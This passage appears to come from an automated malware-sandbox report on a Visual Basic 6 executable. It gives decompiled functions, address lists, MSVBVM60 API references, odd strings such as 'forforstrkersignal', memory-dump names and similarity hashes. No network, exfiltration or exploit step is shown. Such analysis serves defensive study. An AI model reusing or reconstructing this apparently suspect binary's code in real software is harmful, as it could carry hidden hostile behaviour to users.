					if( *0x41b2d4 != 0) {
						_v192 = 0x41b2d4;
					} else {
						_push(0x41b2d4);
						_push(0x40ed14);
						L0040185C();
						_v192 = 0x41b2d4;
					}
					_v160 =  *_v192;
					_t140 =  &_v40;
					L004016CA();
					_t143 =  *((intOrPtr*)( *_v160 + 0x10))(_v160, _t140, _t140, _a4);
					asm("fclex");
					_v164 = _t143;
					if(_v164 >= 0) {
						_t88 =  &_v196;
						 *_t88 = _v196 & 0x00000000;
						__eflags =  *_t88;
					} else {
						_push(0x10);
						_push(0x40ed04);
						_push(_v160);
						_push(_v164);
						L00401856();
						_v196 = _t143;
					}
					L00401850();
				}
				if( *0x41b010 != 0) {
					_v200 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v200 = 0x41b010;
				}
				_t133 =  &_v40;
				L00401862();
				_v160 = _t133;
				_t136 =  *((intOrPtr*)( *_v160 + 0x1f8))(_v160, _t133,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x318))( *_v200));
				asm("fclex");
				_v164 = _t136;
				if(_v164 >= 0) {
					_t106 =  &_v204;
					 *_t106 = _v204 & 0x00000000;
					__eflags =  *_t106;
				} else {
					_push(0x1f8);
					_push(0x40ea8c);
					_push(_v160);
					_push(_v164);
					L00401856();
					_v204 = _t136;
				}
				L00401850();
				asm("wait");
				_push(0x4170e7);
				L0040182C();
				_t137 =  &_v32;
				_push(_t137);
				_push(0);
				L004017DE();
				return _t137;
			}

0x00416cd4
0x00416ce3
0x00416cef
0x00416cf7
0x00416cfa
0x00416d01
0x00416d10
0x00416d16
0x00416d19
0x00416d1e
0x00416d25
0x00416d2c
0x00416d33
0x00416d3d
0x00416d41
0x00416d42
0x00416d44
0x00416d45
0x00416d46
0x00416d49
0x00416d4b
0x00416d4c
0x00416d4d
0x00416d50
0x00416d52
0x00416d53
0x00416d54
0x00416d57
0x00416d59
0x00416d5a
0x00416d5b
0x00416d5e
0x00416d63
0x00416d68
0x00416d6e
0x00416d70
0x00416d71
0x00416d7f
0x00416d7f
0x00416d7f
0x00416d73
0x00416d73
0x00416d73
0x00416d8e
0x00416d98
0x00416d9c
0x00416d9d
0x00416d9f
0x00416da4
0x00416db0
0x00416db6
0x00416dbd
0x00416dc4
0x00416dcb
0x00416dd2
0x00416dd9
0x00416de7
0x00416e04
0x00416de9
0x00416de9
0x00416dee
0x00416df3
0x00416df8
0x00416df8
0x00416e28
0x00416e2c
0x00416e31
0x00416e49
0x00416e4f
0x00416e51
0x00416e5e
0x00416e83
0x00416e83
0x00416e83
0x00416e60
0x00416e60
0x00416e65
0x00416e6a
0x00416e70
0x00416e76
0x00416e7b
0x00416e7b
0x00416e8d
0x00416e93
0x00416e9d
0x00416ea0
0x00416eaa
0x00416eae
0x00416eb2
0x00416eb3
0x00416eb8
0x00416eb9
0x00416ec1
0x00416ec9
0x00416ecd
0x00416ed1
0x00416ed5
0x00416ed6
0x00416ed8
0x00416edd
0x00416edd
0x00416ee0
0x00416ee7
0x00416eee
0x00416ef0
0x00416ef5
0x00416ef6
0x00416efe
0x00416eff
0x00416f04
0x00416f07
0x00416f08
0x00416f0d
0x00416f12
0x00416f1e
0x00416f22
0x00416f23
0x00416f2b
0x00416f2c
0x00416f2f
0x00416f30
0x00416f32
0x00416f3a
0x00416f3c
0x00416f3f
0x00416f44
0x00416f46
0x00416f4b
0x00416f52
0x00416f5f
0x00416f7c
0x00416f61
0x00416f61
0x00416f66
0x00416f6b
0x00416f70
0x00416f70
0x00416f8e
0x00416f97
0x00416f9b
0x00416faf
0x00416fb2
0x00416fb4
0x00416fc1
0x00416fe3
0x00416fe3
0x00416fe3
0x00416fc3
0x00416fc3
0x00416fc5
0x00416fca
0x00416fd0
0x00416fd6
0x00416fdb
0x00416fdb
0x00416fed
0x00416fed
0x00416ff9
0x00417016
0x00416ffb
0x00416ffb
0x00417000
0x00417005
0x0041700a
0x0041700a
0x0041703a
0x0041703e
0x00417043
0x00417057
0x0041705d
0x0041705f
0x0041706c
0x00417091
0x00417091
0x00417091
0x0041706e
0x0041706e
0x00417073
0x00417078
0x0041707e
0x00417084
0x00417089
0x00417089
0x0041709b
0x004170a0
0x004170a1
0x004170d6
0x004170db
0x004170de
0x004170df
0x004170e1
0x004170e6

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00416CEF
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00416D19
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00416D5E
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00416D63
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00416D9F
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00416DF3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416E2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EC18,000000D0), ref: 00416E76
#595.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 00416EB9
__vbaFreeObj.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 00416EC1
__vbaFreeVarList.MSVBVM60(00000004,00000008,0000000A,0000000A,0000000A,00000008,00000000,0000000A,0000000A,0000000A), ref: 00416ED8
#711.MSVBVM60(?,0040F048,0000000A,000000FF,00000000), ref: 00416EFF
__vbaAryVar.MSVBVM60(00002008,?,?,0040F048,0000000A,000000FF,00000000), ref: 00416F0D
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,0040F048,0000000A,000000FF,00000000), ref: 00416F23
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,0040F048,0000000A,000000FF,00000000), ref: 00416F32
__vbaDerefAry1.MSVBVM60(?,00000000,?,?,?,?,?,004015E6), ref: 00416F3F
__vbaStrCmp.MSVBVM60(0040ECC0,00000000,?,00000000,?,?,?,?,?,004015E6), ref: 00416F4B
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,0040ECC0,00000000,?,00000000,?,?,?,?,?,004015E6), ref: 00416F6B
__vbaObjSetAddref.MSVBVM60(?,00401488), ref: 00416F9B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000010), ref: 00416FD6
__vbaFreeObj.MSVBVM60(00000000,?,0040ED04,00000010), ref: 00416FED
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040ECC0,00000000,?,00000000,?,?,?,?,?,004015E6), ref: 00417005
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041703E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001F8), ref: 00417084
__vbaFreeObj.MSVBVM60(00000000,?,0040EA8C,000001F8), ref: 0041709B
__vbaFreeStr.MSVBVM60(004170E7), ref: 004170D6
__vbaAryDestruct.MSVBVM60(00000000,?,004170E7), ref: 004170E1

Strings

p"w, xrefs: 00416DE0, 00416DE9, 00416DF8, 00416E04, 00416FF2, 00416FFB, 0041700A, 00417016

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListNew2$Copy$#595#675#711AddrefAry1ChkstkDerefDestruct
String ID: p"w
API String ID: 3473249859-3261273085
Opcode ID: f0a948bdd9a3a59669af022bf125401d1a655d06e371e8a5c9bff99ffd12855c
Instruction ID: 0acb4ef644f1c06de7d6027b1a2643e426147cbcab96092b0acb3d86c13ff99c
Opcode Fuzzy Hash: f0a948bdd9a3a59669af022bf125401d1a655d06e371e8a5c9bff99ffd12855c
Instruction Fuzzy Hash: FCB1F871900218EFDB10EFA1CD45FDEB7B9FB08304F1045AAE109A72A1D7799A85CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00415A39, Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00415A39(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				char* _v116;
				char _v124;
				void* _v128;
				void* _v132;
				signed int _v136;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				short _t71;
				short _t75;
				short _t78;
				char* _t82;
				signed int _t86;
				short _t87;
				char* _t91;
				signed int _t95;
				char* _t101;
				intOrPtr _t118;
				long long* _t119;
				intOrPtr _t121;
				long long _t126;

				_t126 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				L004015E0();
				_v12 = _t118;
				_v8 = 0x4013b8;
				L00401820();
				_push(2);
				_push(0x40ee00);
				L0040175A();
				L00401814();
				_push(0x88);
				_push(0x40ee0c);
				L00401772();
				asm("sbb eax, eax");
				_v132 =  ~( ~( ~0x88));
				_t101 =  &_v40;
				L0040182C();
				_t71 = _v132;
				if(_t71 != 0) {
					_push(0xcc);
					L00401754();
					_v28 = _t71;
				}
				_v52 = 0x80020004;
				_v60 = 0xa;
				_push( &_v60);
				_push( &_v76);
				L00401748();
				_v116 = L"forforstrkersignal";
				_v124 = 0x8008;
				_push( &_v76);
				_t75 =  &_v124;
				_push(_t75);
				L0040174E();
				_v132 = _t75;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L004017BA();
				_t119 = _t118 + 0xc;
				_t78 = _v132;
				_t121 = _t78;
				if(_t121 != 0) {
					_push(0xaa);
					L00401742();
					_v32 = _t78;
				}
				asm("fld1");
				_push(_t101);
				_push(_t101);
				 *_t119 = _t126;
				L0040173C();
				L004017C6();
				asm("fcomp qword [0x4013b0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t121 != 0) {
					if( *0x41b010 != 0) {
						_v144 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v144 = 0x41b010;
					}
					_t91 =  &_v44;
					L00401862();
					_v132 = _t91;
					_t95 =  *((intOrPtr*)( *_v132 + 0xf8))(_v132,  &_v40, _t91,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x338))( *_v144));
					asm("fclex");
					_v136 = _t95;
					if(_v136 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40eae4);
						_push(_v132);
						_push(_v136);
						L00401856();
						_v148 = _t95;
					}
					_push(_v40);
					_push(0x4a);
					_push(0xffffffff);
					_push(0x20);
					L00401736();
					L0040182C();
					L00401850();
				}
				if( *0x41b010 != 0) {
					_v152 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v152 = 0x41b010;
				}
				_t82 =  &_v44;
				L00401862();
				_v132 = _t82;
				_t86 =  *((intOrPtr*)( *_v132 + 0x158))(_v132,  &_v128, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x304))( *_v152));
				asm("fclex");
				_v136 = _t86;
				if(_v136 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x40ec28);
					_push(_v132);
					_push(_v136);
					L00401856();
					_v156 = _t86;
				}
				_t87 = _v128;
				_v24 = _t87;
				L00401850();
				asm("wait");
				_push(0x415ce3);
				L0040182C();
				return _t87;
			}

0x00415a39
0x00415a3e
0x00415a49
0x00415a4a
0x00415a56
0x00415a5e
0x00415a61
0x00415a6e
0x00415a73
0x00415a75
0x00415a7a
0x00415a84
0x00415a89
0x00415a8a
0x00415a8f
0x00415a96
0x00415a9c
0x00415aa0
0x00415aa3
0x00415aa8
0x00415aae
0x00415ab0
0x00415ab5
0x00415aba
0x00415aba
0x00415abd
0x00415ac4
0x00415ace
0x00415ad2
0x00415ad3
0x00415ad8
0x00415adf
0x00415ae9
0x00415aea
0x00415aed
0x00415aee
0x00415af3
0x00415afa
0x00415afe
0x00415aff
0x00415b01
0x00415b06
0x00415b09
0x00415b0d
0x00415b0f
0x00415b11
0x00415b16
0x00415b1e
0x00415b1e
0x00415b21
0x00415b23
0x00415b24
0x00415b25
0x00415b28
0x00415b2d
0x00415b32
0x00415b38
0x00415b3a
0x00415b3b
0x00415b48
0x00415b65
0x00415b4a
0x00415b4a
0x00415b4f
0x00415b54
0x00415b59
0x00415b59
0x00415b89
0x00415b8d
0x00415b92
0x00415ba1
0x00415ba7
0x00415ba9
0x00415bb6
0x00415bd8
0x00415bb8
0x00415bb8
0x00415bbd
0x00415bc2
0x00415bc5
0x00415bcb
0x00415bd0
0x00415bd0
0x00415bdf
0x00415be2
0x00415be4
0x00415be6
0x00415be8
0x00415bf0
0x00415bf8
0x00415bf8
0x00415c04
0x00415c21
0x00415c06
0x00415c06
0x00415c0b
0x00415c10
0x00415c15
0x00415c15
0x00415c45
0x00415c49
0x00415c4e
0x00415c5d
0x00415c63
0x00415c65
0x00415c72
0x00415c94
0x00415c74
0x00415c74
0x00415c79
0x00415c7e
0x00415c81
0x00415c87
0x00415c8c
0x00415c8c
0x00415c9b
0x00415c9f
0x00415ca6
0x00415cab
0x00415cac
0x00415cdd
0x00415ce2

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00415A56
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00415A6E
#512.MSVBVM60(0040EE00,00000002,?,?,?,?,004015E6), ref: 00415A7A
__vbaStrMove.MSVBVM60(0040EE00,00000002,?,?,?,?,004015E6), ref: 00415A84
__vbaStrCmp.MSVBVM60(0040EE0C,00000000,0040EE00,00000002,?,?,?,?,004015E6), ref: 00415A8F
__vbaFreeStr.MSVBVM60(0040EE0C,00000000,0040EE00,00000002,?,?,?,?,004015E6), ref: 00415AA3
#568.MSVBVM60(000000CC,0040EE0C,00000000,0040EE00,00000002,?,?,?,?,004015E6), ref: 00415AB5
#647.MSVBVM60(?,0000000A,?,?,?,0040EE0C,00000000,0040EE00,00000002,?,?,?,?,004015E6), ref: 00415AD3
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 00415AEE
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00008008,?), ref: 00415B01
#571.MSVBVM60(000000AA), ref: 00415B16
#587.MSVBVM60(?,?,000000AA), ref: 00415B28
__vbaFpR8.MSVBVM60(?,?,000000AA), ref: 00415B2D
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00415B54
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415B8D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,000000F8), ref: 00415BCB
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000004A,?), ref: 00415BE8
__vbaFreeStr.MSVBVM60(00000020,000000FF,0000004A,?), ref: 00415BF0
__vbaFreeObj.MSVBVM60(00000020,000000FF,0000004A,?), ref: 00415BF8
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00415C10
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415C49
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EC28,00000158), ref: 00415C87
__vbaFreeObj.MSVBVM60(00000000,?,0040EC28,00000158), ref: 00415CA6
__vbaFreeStr.MSVBVM60(00415CE3), ref: 00415CDD

Strings

p"w, xrefs: 00415B41, 00415B4A, 00415B59, 00415B65, 00415BFD, 00415C06, 00415C15, 00415C21
forforstrkersignal, xrefs: 00415AD8

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#512#568#571#587#647ChkstkCopyFileListMoveOpen
String ID: forforstrkersignal$p"w
API String ID: 1025358927-173951524
Opcode ID: 9aa87cdfeb64b2e465a50eeace3800a0dc392212f61fcbe4a86e15e481de71c0
Instruction ID: 05bd3cc16dc4f9450a2aee013f10019877388c79a6832830e0c0846b329547af
Opcode Fuzzy Hash: 9aa87cdfeb64b2e465a50eeace3800a0dc392212f61fcbe4a86e15e481de71c0
Instruction Fuzzy Hash: 62612D71900618DBDB10EFA1CC85BDDBBB8FF08708F10456AF105B72A1EB785A84DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414662, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00414662(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				short _v144;
				signed int _v148;
				signed int _v152;
				char* _t118;
				signed int _t121;
				char* _t125;
				char* _t129;
				signed int _t133;
				signed int _t137;
				char* _t143;
				signed int _t147;
				char* _t151;
				signed int _t158;
				char* _t160;
				intOrPtr _t179;
				intOrPtr _t192;
				signed int _t205;

				_t205 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t192;
				L004015E0();
				_v12 = _t192;
				_v8 = 0x401338;
				if( *0x41b010 != 0) {
					_v108 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v108 = 0x41b010;
				}
				_t118 =  &_v28;
				L00401862();
				_v88 = _t118;
				_t121 =  *((intOrPtr*)( *_v88 + 0x1b8))(_v88, _t118,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x304))( *_v108));
				asm("fclex");
				_v92 = _t121;
				if(_v92 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x40ec28);
					_push(_v88);
					_push(_v92);
					L00401856();
					_v112 = _t121;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v116 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v116 = 0x41b010;
				}
				_push( *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x318))( *_v116));
				_t125 =  &_v32;
				_push(_t125);
				L00401862();
				_v96 = _t125;
				_v40 = 0x80020004;
				_v48 = 0xa;
				if( *0x41b010 != 0) {
					_v120 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v120 = 0x41b010;
				}
				_t129 =  &_v28;
				L00401862();
				_v88 = _t129;
				_t133 =  *((intOrPtr*)( *_v88 + 0x148))(_v88,  &_v24, _t129,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x300))( *_v120));
				asm("fclex");
				_v92 = _t133;
				if(_v92 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x148);
					_push(0x40eae4);
					_push(_v88);
					_push(_v92);
					L00401856();
					_v124 = _t133;
				}
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t137 =  *((intOrPtr*)( *_v96 + 0x1ec))(_v96, _v24, 0x10);
				asm("fclex");
				_v100 = _t137;
				if(_v100 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40ea8c);
					_push(_v96);
					_push(_v100);
					L00401856();
					_v128 = _t137;
				}
				L0040182C();
				_push( &_v32);
				_push( &_v28);
				_push(2);
				L00401826();
				if( *0x41b010 != 0) {
					_v132 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v132 = 0x41b010;
				}
				_t143 =  &_v28;
				L00401862();
				_v88 = _t143;
				_t147 =  *((intOrPtr*)( *_v88 + 0x180))(_v88,  &_v84, _t143,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x34c))( *_v132));
				asm("fclex");
				_v92 = _t147;
				if(_v92 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40eac4);
					_push(_v88);
					_push(_v92);
					L00401856();
					_v136 = _t147;
				}
				if( *0x41b010 != 0) {
					_v140 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v140 = 0x41b010;
				}
				_t179 =  *((intOrPtr*)( *_v140));
				_t151 =  &_v32;
				L00401862();
				_v96 = _t151;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v84;
				asm("fild dword [ebp-0x8c]");
				_v148 = _t205;
				_v124 = _v148;
				_t158 =  *((intOrPtr*)( *_v96 + 0x204))(_v96, _t179, 0x10, 0x10, 0x10, _t151,  *((intOrPtr*)(_t179 + 0x318))( *_v140));
				asm("fclex");
				_v100 = _t158;
				if(_v100 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x204);
					_push(0x40ea8c);
					_push(_v96);
					_push(_v100);
					L00401856();
					_v152 = _t158;
				}
				_push( &_v32);
				_t160 =  &_v28;
				_push(_t160);
				_push(2);
				L00401826();
				asm("wait");
				_push(0x414a23);
				return _t160;
			}

0x00414662
0x00414667
0x00414672
0x00414673
0x0041467f
0x00414687
0x0041468a
0x00414698
0x004146b2
0x0041469a
0x0041469a
0x0041469f
0x004146a4
0x004146a9
0x004146a9
0x004146cd
0x004146d1
0x004146d6
0x004146e1
0x004146e7
0x004146e9
0x004146f0
0x0041470c
0x004146f2
0x004146f2
0x004146f7
0x004146fc
0x004146ff
0x00414702
0x00414707
0x00414707
0x00414713
0x0041471f
0x00414739
0x00414721
0x00414721
0x00414726
0x0041472b
0x00414730
0x00414730
0x00414753
0x00414754
0x00414757
0x00414758
0x0041475d
0x00414760
0x00414767
0x00414775
0x0041478f
0x00414777
0x00414777
0x0041477c
0x00414781
0x00414786
0x00414786
0x004147aa
0x004147ae
0x004147b3
0x004147c2
0x004147c8
0x004147ca
0x004147d1
0x004147ed
0x004147d3
0x004147d3
0x004147d8
0x004147dd
0x004147e0
0x004147e3
0x004147e8
0x004147e8
0x004147f4
0x004147fe
0x004147ff
0x00414800
0x00414801
0x0041480d
0x00414813
0x00414815
0x0041481c
0x00414838
0x0041481e
0x0041481e
0x00414823
0x00414828
0x0041482b
0x0041482e
0x00414833
0x00414833
0x0041483f
0x00414847
0x0041484b
0x0041484c
0x0041484e
0x0041485d
0x00414877
0x0041485f
0x0041485f
0x00414864
0x00414869
0x0041486e
0x0041486e
0x00414892
0x00414896
0x0041489b
0x004148aa
0x004148b0
0x004148b2
0x004148b9
0x004148d8
0x004148bb
0x004148bb
0x004148c0
0x004148c5
0x004148c8
0x004148cb
0x004148d0
0x004148d0
0x004148e6
0x00414903
0x004148e8
0x004148e8
0x004148ed
0x004148f2
0x004148f7
0x004148f7
0x0041491d
0x00414927
0x0041492b
0x00414930
0x00414933
0x0041493a
0x00414941
0x00414948
0x0041494f
0x00414956
0x00414960
0x0041496a
0x0041496b
0x0041496c
0x0041496d
0x00414971
0x0041497b
0x0041497c
0x0041497d
0x0041497e
0x00414982
0x0041498c
0x0041498d
0x0041498e
0x0041498f
0x00414994
0x0041499a
0x004149a0
0x004149ad
0x004149b8
0x004149be
0x004149c0
0x004149c7
0x004149e6
0x004149c9
0x004149c9
0x004149ce
0x004149d3
0x004149d6
0x004149d9
0x004149de
0x004149de
0x004149f0
0x004149f1
0x004149f4
0x004149f5
0x004149f7
0x004149ff
0x00414a00
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 0041467F
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 004146A4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EC28,000001B8), ref: 00414702
__vbaFreeObj.MSVBVM60 ref: 00414713
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 0041472B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414758
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,00000000), ref: 00414781
__vbaObjSet.MSVBVM60(?,00000000), ref: 004147AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000148), ref: 004147E3
__vbaChkstk.MSVBVM60 ref: 004147F4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 0041482E
__vbaFreeStr.MSVBVM60 ref: 0041483F
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041484E
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00414869
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414896
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,00000180), ref: 004148CB
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 004148F2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041492B
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414960
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414971
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414982
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,00000204,?,?,00000000), ref: 004149D9
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 004149F7

Strings

p"w, xrefs: 00414691, 0041469A, 004146A9, 004146B2, 00414718, 00414721, 00414730, 00414739, 0041476E, 00414777, 00414786, 0041478F, 00414856, 0041485F, 0041486E, 00414877, 004148DF, 004148E8, 004148F7, 00414903

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkHresultNew2$Free$List
String ID: p"w
API String ID: 4119418001-3261273085
Opcode ID: b428a6622f02830a4d1bad23633cdc3fda91a39b4f16794198d4b22bdf7d8bd5
Instruction ID: b5a10960e33269108092c54b5d678e45400f47a7c96355ab4842311abebccf9e
Opcode Fuzzy Hash: b428a6622f02830a4d1bad23633cdc3fda91a39b4f16794198d4b22bdf7d8bd5
Instruction Fuzzy Hash: 6EB1F471E002089FCB10EFE1C845BDEBBB5FB08704F20846AE515AB2A1D7795985DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004189C2, Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004189C2(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				short _v100;
				void* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				short _v136;
				char _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _t81;
				char* _t89;
				signed int _t93;
				char* _t97;
				signed int _t104;
				char* _t110;
				signed int _t113;
				intOrPtr _t124;
				intOrPtr _t140;
				char _t149;

				_t149 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t140;
				L004015E0();
				_v12 = _t140;
				_v8 = 0x401520;
				_v40 = 9;
				_v48 = 2;
				_t81 =  &_v48;
				_push(_t81);
				L004016A0();
				L00401814();
				_push(_t81);
				_push(0x40f0ac);
				L00401772();
				asm("sbb eax, eax");
				_v104 =  ~( ~( ~_t81));
				L0040182C();
				L00401838();
				if(_v104 != 0) {
					_push(L"sesquiquartile");
					L004017CC();
				}
				if( *0x41b010 != 0) {
					_v124 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v124 = 0x41b010;
				}
				_t89 =  &_v28;
				L00401862();
				_v104 = _t89;
				_t93 =  *((intOrPtr*)( *_v104 + 0xd0))(_v104,  &_v100, _t89,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x318))( *_v124));
				asm("fclex");
				_v108 = _t93;
				if(_v108 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x40ea8c);
					_push(_v104);
					_push(_v108);
					L00401856();
					_v128 = _t93;
				}
				if( *0x41b010 != 0) {
					_v132 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v132 = 0x41b010;
				}
				_t124 =  *((intOrPtr*)( *_v132));
				_t97 =  &_v32;
				L00401862();
				_v112 = _t97;
				_v88 = 0x80020004;
				_v96 = 0xa;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
